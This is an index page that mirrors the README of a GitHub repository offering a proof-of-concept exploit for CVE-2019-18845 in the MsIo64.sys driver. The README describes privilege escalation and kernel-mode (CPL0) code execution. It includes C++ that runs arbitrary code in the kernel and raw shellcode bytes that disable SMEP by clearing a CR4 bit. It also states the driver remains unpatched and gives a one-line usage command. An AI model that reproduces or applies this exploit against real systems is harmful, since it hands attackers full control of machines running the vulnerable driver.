Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/kkent030315/msioexploit
Exploit MsIo vulnerable driver
cve-2019-18845 kernel kernel-exploit kernel-exploits windows
Last synced: 4 months ago
- Host: GitHub
- URL: https://github.com/kkent030315/msioexploit
- Owner: kkent030315
- License: mit
- Created: 2021-06-26T20:31:03.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-08-12T00:06:19.000Z (over 3 years ago)
- Last Synced: 2024-10-12T19:43:15.553Z (4 months ago)
- Topics: cve-2019-18845, kernel, kernel-exploit, kernel-exploits, windows
- Language: C++
- Homepage:
- Size: 620 KB
- Stars: 81
- Watchers: 9
- Forks: 35
- Open Issues: 2
Metadata Files:
- Readme: README.md
- License: LICENSE
README
# MsIoExploit
Exploit MsIo vulnerable driver
# Description
This is a PoC for [CVE-2019-18845](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18845) in `MsIo64.sys`, which allows a non-privileged user to map/unmap arbitrary physical memory via `ZwMapViewOfSection` / `ZwUnmapViewOfSection`.

If you are interested in abusing physical memory mapping, see [project anycall](https://github.com/kkent030315/anycall/tree/main/anycall), which has a full implementation of the client- and driver-side functionality.

Allowing a non-privileged (non-kernel) component to map arbitrary physical memory is the most *bad* practice and a critically vulnerable design that lets an attacker gain full control of the system, as demonstrated by the arbitrary NT kernel API invocation in this PoC.

You can try it yourself by executing this while the driver is running.

Also, this driver and `MsIo64.dll` are a full copy & paste of [IO-Memory](https://github.com/Bleichroder/IO-Memory).

This vulnerability was first reported in 2019 but still remains unfixed, and hardware vendors like ASRock still use this driver.
### Features
- Privilege Escalation
- Shellcode Execution
- Arbitrary code execution in CPL0 context
- `__writemsr`, `__cpuid` or whatever

I've implemented a replica of the Capcom exploit so you can execute any code in CPL0 context, as follows:

```cpp
unsigned long long cr4 = 0;
static auto ntoskrnl_image_base = this->ntoskrnl_image_base;
static uint16_t dos_signature = 0x0;

this->disable_smep(&cr4);
// lambda will be called in the CPL0
this->exec_in_kernel([]() -> void
{
    // direct access to the kernel virtual memory
    dos_signature = *(uint16_t*)(ntoskrnl_image_base);
});
this->enable_smep(&cr4);
```

Please note that the lambda cannot capture anything, because a capturing lambda cannot be converted to a function pointer, so only `static` members are accessible from inside the lambda. Also, in the CPL0 context certain functions cannot be called; calling something like `printf` will of course cause a BSOD.
Shellcode execution looks like this:

```cpp
void exploit::disable_smep(unsigned long long* old_cr4)
{
    // saves the current CR4 into *old_cr4 (passed in rcx), then clears bit 20 (SMEP)
    static uint8_t disable_smep_shellcode[] = {
        0xFA,                               // cli
        0x0F, 0x20, 0xE0,                   // mov rax, cr4
        0x48, 0x89, 0x01,                   // mov QWORD PTR [rcx], rax
        0x48, 0x25, 0xFF, 0xFF, 0xEF, 0xFF, // and rax, 0xffffffffffefffff
        0x0F, 0x22, 0xE0,                   // mov cr4, rax
        0xC3 };                             // ret

    this->execute_shellcode_in_kernel(
        reinterpret_cast<void*>(&disable_smep_shellcode),
        sizeof(disable_smep_shellcode),
        old_cr4);
}
```

Now we have full control of the system; no need to do dumbass things like mapping unsigned drivers.
# Usage
```bash
> MsIoExploit.exe
```

# Credit
Several sources regarding token steal are from [ExploitCapcom](https://github.com/tandasat/ExploitCapcom)
Credit [@tandasat](https://github.com/tandasat/)
# License
MIT copyright Kento Oki